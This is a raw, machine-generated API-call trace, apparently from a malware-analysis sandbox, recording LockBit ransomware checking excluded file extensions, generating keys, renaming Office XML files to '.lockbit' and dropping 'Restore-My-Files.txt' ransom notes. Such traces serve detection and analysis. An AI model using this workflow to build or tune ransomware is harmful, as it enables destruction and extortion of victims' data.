ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xccc5300, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adjacency.xml", cAlternateFileName="ADJACE~1.XML")) returned 1 [0195.473] lstrcmpiW (lpString1=".", lpString2="Adjacency.xml") returned -1 [0195.473] lstrcmpiW (lpString1="..", lpString2="Adjacency.xml") returned -1 [0195.473] PathFindExtensionW (pszPath="Adjacency.xml") returned=".xml" [0195.473] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.473] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.473] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.473] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.473] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.473] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.473] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.473] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.473] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.473] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.473] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.473] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.474] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Adjacency.xml") returned 1 [0195.475] lstrcmpiW (lpString1="ntldr", lpString2="Adjacency.xml") returned 1 [0195.475] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Adjacency.xml") returned 1 [0195.475] lstrcmpiW (lpString1="bootsect.bak", lpString2="Adjacency.xml") returned 1 [0195.475] lstrcmpiW (lpString1="autorun.inf", lpString2="Adjacency.xml") returned 1 [0195.475] lstrcmpiW (lpString1="thumbs.db", lpString2="Adjacency.xml") returned 1 [0195.475] lstrcmpiW (lpString1="iconcache.db", lpString2="Adjacency.xml") returned 1 [0195.475] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.475] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml") returned=".xml" [0195.475] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.475] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.475] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.476] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.476] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml.lockbit") returned 87 [0195.476] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\adjacency.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0195.480] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.480] malloc (_Size=0x40068) returned 0x3df0008 [0195.480] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3609) returned 1 [0195.480] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.481] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.484] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.484] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.484] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0195.485] free (_Block=0x1fa2ed8) [0195.486] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.486] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.486] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.487] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.487] malloc (_Size=0x40068) returned 0x3d70450 [0195.487] WriteFile (in: hFile=0x170, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0195.488] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfd8000, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdfd8000, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Angles.xml", cAlternateFileName="")) returned 1 [0195.488] lstrcmpiW (lpString1=".", lpString2="Angles.xml") returned -1 [0195.488] lstrcmpiW (lpString1="..", lpString2="Angles.xml") returned -1 [0195.488] PathFindExtensionW (pszPath="Angles.xml") returned=".xml" [0195.488] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.488] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.488] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.488] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.488] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.489] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.490] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Angles.xml") returned 1 [0195.490] lstrcmpiW (lpString1="ntldr", lpString2="Angles.xml") returned 1 [0195.490] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Angles.xml") returned 1 [0195.490] lstrcmpiW (lpString1="bootsect.bak", lpString2="Angles.xml") returned 1 [0195.490] lstrcmpiW (lpString1="autorun.inf", lpString2="Angles.xml") returned 1 [0195.491] lstrcmpiW (lpString1="thumbs.db", lpString2="Angles.xml") returned 1 [0195.491] lstrcmpiW (lpString1="iconcache.db", lpString2="Angles.xml") returned 1 [0195.491] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.491] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml") returned=".xml" [0195.491] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.491] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.491] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.492] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.492] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml.lockbit") returned 84 [0195.492] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\angles.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0195.494] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.494] malloc (_Size=0x40068) returned 0x3f70048 [0195.494] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=3626) returned 1 [0195.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0195.495] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0195.495] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0195.502] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.502] malloc (_Size=0xbe) returned 0x1fa2ed8 [0195.502] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0195.503] free (_Block=0x1fa2ed8) [0195.503] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.503] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.503] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.503] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb6b6700, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x61830490, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeb6b6700, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xeee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apex.xml", cAlternateFileName="")) returned 1 [0195.503] lstrcmpiW (lpString1=".", lpString2="Apex.xml") returned -1 [0195.503] lstrcmpiW (lpString1="..", lpString2="Apex.xml") returned -1 [0195.503] PathFindExtensionW (pszPath="Apex.xml") returned=".xml" [0195.503] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.503] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.503] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.504] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.505] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Apex.xml") returned 1 [0195.506] lstrcmpiW (lpString1="ntldr", lpString2="Apex.xml") returned 1 [0195.506] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Apex.xml") returned 1 [0195.506] lstrcmpiW (lpString1="bootsect.bak", lpString2="Apex.xml") returned 1 [0195.506] lstrcmpiW (lpString1="autorun.inf", lpString2="Apex.xml") returned 1 [0195.506] lstrcmpiW (lpString1="thumbs.db", lpString2="Apex.xml") returned 1 [0195.506] lstrcmpiW (lpString1="iconcache.db", lpString2="Apex.xml") returned 1 [0195.506] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.506] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml") returned=".xml" [0195.506] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.506] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.506] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.507] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.507] lstrcmpiW (lpString1=".sdb", 